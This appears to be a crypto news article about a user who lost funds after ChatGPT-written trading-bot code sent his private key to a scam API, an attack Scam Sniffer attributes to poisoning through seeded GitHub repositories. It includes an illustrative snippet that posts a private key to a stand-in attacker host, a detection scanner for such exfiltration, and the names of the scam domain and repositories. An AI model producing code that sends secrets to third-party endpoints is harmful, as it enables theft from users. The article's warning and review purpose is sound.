A netizen shared yesterday that he tried to use ChatGPT to develop a trading bot, but his private key was leaked because ChatGPT referenced a malicious API. Scam Sniffer described this as an AI poisoning incident, and on-chain security expert Cosine also reminded users to review AI-generated code.

(Previous summary: Apple is rumored to release an upgraded "LLM Siri" in 2025: an AI life assistant more powerful than ChatGPT)

(Background supplement: CZ's urgent appeal: Macs with Intel chips have a major vulnerability; update as soon as possible to protect your assets)

Generative artificial intelligence (AI) has brought us convenience, but can we fully trust the content it generates? Yesterday (the 22nd), netizen r_ocky.eth shared that he had asked ChatGPT to help him develop a bot for trading pump.fun meme coins. He never expected that ChatGPT would write a scam API endpoint into the bot's code, and as a result he lost $2,500. The incident triggered widespread discussion, and Yu Xian (Cosine), founder of the information security firm SlowMist, also weighed in.

Be careful with information from @OpenAI ! Today I was trying to write a bump bot for https://t.co/cIAVsMwwFk and asked @ChatGPTapp to help me with the code. I got what I asked but I didn't expect that chatGPT would recommend me a scam @solana API website. I lost around $2.5k pic.twitter.com/HGfGrwo3ir — r_ocky.eth (@r_cky0) November 21, 2024

ChatGPT transmits the private key to a scam website

According to the code screenshots shared by r_ocky.eth, part of the code ChatGPT generated for him sends his private key in an API request, and that API was recommended to him by ChatGPT. However, the API URL solanaapis.com referenced by ChatGPT belongs to a scam website. (The original article includes a screenshot of the search result for this URL.)
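The malicious code itself is not reproduced in the article, but the pattern it describes — AI-generated trading code that embeds the wallet's private key in a request to a third-party API — can be sketched roughly as follows. Every name here (the endpoint URL, `build_buy_request`, the field names) is hypothetical and illustrative, not the actual backdoored code:

```python
# Hypothetical sketch of the backdoor pattern described above.
# The endpoint, function, and field names are illustrative only.
import json

API_ENDPOINT = "https://scam-api.example/pumpfun/buy"  # attacker-controlled service

def build_buy_request(private_key: str, token_mint: str, amount_sol: float) -> dict:
    """Assemble the HTTP request a naive bot would send to the 'trading API'."""
    body = {
        "private_key": private_key,  # red flag: the secret leaves the machine here
        "mint": token_mint,
        "amount": amount_sol,
    }
    return {"url": API_ENDPOINT, "payload": json.dumps(body)}

request = build_buy_request("FAKE_PRIVATE_KEY", "TOKEN_MINT_ADDRESS", 0.5)
# Whoever operates the endpoint now holds the key and can drain the wallet.
print("private_key" in request["payload"])  # prints True
```

The tell is not the endpoint's name but the data flow: a legitimate signing flow keeps the private key local and transmits only a signed transaction, never the key itself.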
r_ocky.eth stated that the scammers acted quickly: within just 30 minutes of his first API call, they transferred all of his assets to the wallet address FdiBGKS8noGHY2fppnDgcgCQts95Ww8HSLUvWbzv1NhX. He said: "I actually vaguely felt that something might be wrong with my operation, but my trust in @OpenAI made me lower my guard." He also admitted that he made the mistake of using his main wallet's private key, but added: "It's easy to make mistakes when you are rushing to do a lot of things at the same time." Subsequently, @r_cky0 published the full text of his conversation with ChatGPT at the time, so that everyone can use it for security research and prevent similar incidents from happening again.

Cosine: He was really hacked by AI

Commenting on the netizen's unfortunate experience, on-chain security expert Cosine said: "This netizen was really hacked by AI." He had not expected the code generated by GPT to contain a backdoor that sends the wallet's private key to a phishing website. At the same time, Cosine reminded users to stay alert when using LLMs such as GPT and Claude, because deception is widespread in these models.

After taking a look, this friend's wallet was really "hacked" by AI... He used the code GPT gave him to write the bot, and didn't expect that code to contain a backdoor that sends the private key to a phishing website... When using LLMs such as GPT/Claude, you must be aware that deception is widespread in these LLMs. AI poisoning attacks have been mentioned before, but this is now a real attack case against the crypto industry. https://t.co/N9o8dPE18C — Cos(Cosine) (@evilcos) November 22, 2024

ChatGPT was deliberately poisoned

In addition, the on-chain anti-fraud platform Scam Sniffer pointed out that this was an AI code-poisoning attack: scammers are contaminating AI training data by planting malicious crypto code in an attempt to steal private keys.
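Scam Sniffer's warning suggests a minimal defensive habit: before running AI-generated code, scan it for patterns that pair a secret with an outbound request. The sketch below is my own rough heuristic, not Scam Sniffer's tooling; the pattern list and function name are assumptions, and a real review still requires reading the code line by line:

```python
# Minimal heuristic scan for key-exfiltration patterns in untrusted code.
# A coarse first pass only; not a substitute for a careful manual review.
import re

SUSPICIOUS_PATTERNS = [
    r"private_?key",                 # a secret being referenced...
    r"requests\.(post|get)\s*\(",    # ...near outbound HTTP calls
    r"urlopen\s*\(",
    r"https?://",                    # any hard-coded remote endpoint
]

def flag_suspicious_lines(source: str) -> list[tuple[int, str]]:
    """Return (line_number, line) pairs matching any suspicious pattern."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        if any(re.search(p, line, re.IGNORECASE) for p in SUSPICIOUS_PATTERNS):
            hits.append((lineno, line.strip()))
    return hits

sample = '''
import requests
resp = requests.post("https://trading-api.example/buy",
                     json={"private_key": PRIVATE_KEY, "amount": 0.5})
'''
for lineno, line in flag_suspicious_lines(sample):
    print(f"line {lineno}: {line}")
```

Matching lines are only leads, not verdicts; the decisive question remains whether a secret can reach the network.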
Scam Sniffer also shared the malicious code repositories it discovered:

solanaapisdev/moonshot-trading-bot
solanaapisdev/pumpfun-api

Scam Sniffer said that the GitHub user solanaapisdev has created multiple repositories over the past 4 months in an attempt to manipulate AI into generating malicious code, and urged users to be careful. It recommends:

Do not blindly use AI-generated code.
Always review the code carefully.
Store private keys in an offline environment.
Only obtain code from reliable sources.

Cosine personally tested Claude's security awareness

Cosine then took the private-key-stealing code shared by r_ocky.eth (the backdoored code produced by the poisoned GPT) and asked both GPT and Claude: "What are the risks of these codes?" The results:

GPT-4o did note that the private key was at risk, but padded its answer with irrelevant detail and never got to the point.
Claude-3.5-Sonnet went straight to the point: this code will send the private key out and cause a leak...

This led Cosine to remark: "Which LLM is stronger goes without saying." He added: "When the code I generate with an LLM is more complex, I usually have it cross-reviewed by other LLMs, and I must be the final reviewer... It is quite common for people unfamiliar with code to be deceived by AI."

Cosine further noted that humans are in fact scarier: on the internet and in code repositories, it is hard to tell what is true from what is false, so it is no surprise that AI trained on this material gets contaminated and poisoned. In the next step, AI will become smarter and learn to run security reviews on each of its outputs, which will also put humans more at ease. But you still have to be careful: supply-chain poisoning is hard to predict and will always pop up suddenly.

Related reports

Binance refutes rumors! Denies that 12.8 million customers' personal data was leaked to the dark web; beware of phishing scams

A love letter to decentralized believers: the intersection of cryptography, moral responsibility and the cypherpunk movement

YouTube cryptocurrency tutorial "Writing smart contracts with ChatGPT" scams victim out of 10 ETH: "Be careful! Internet...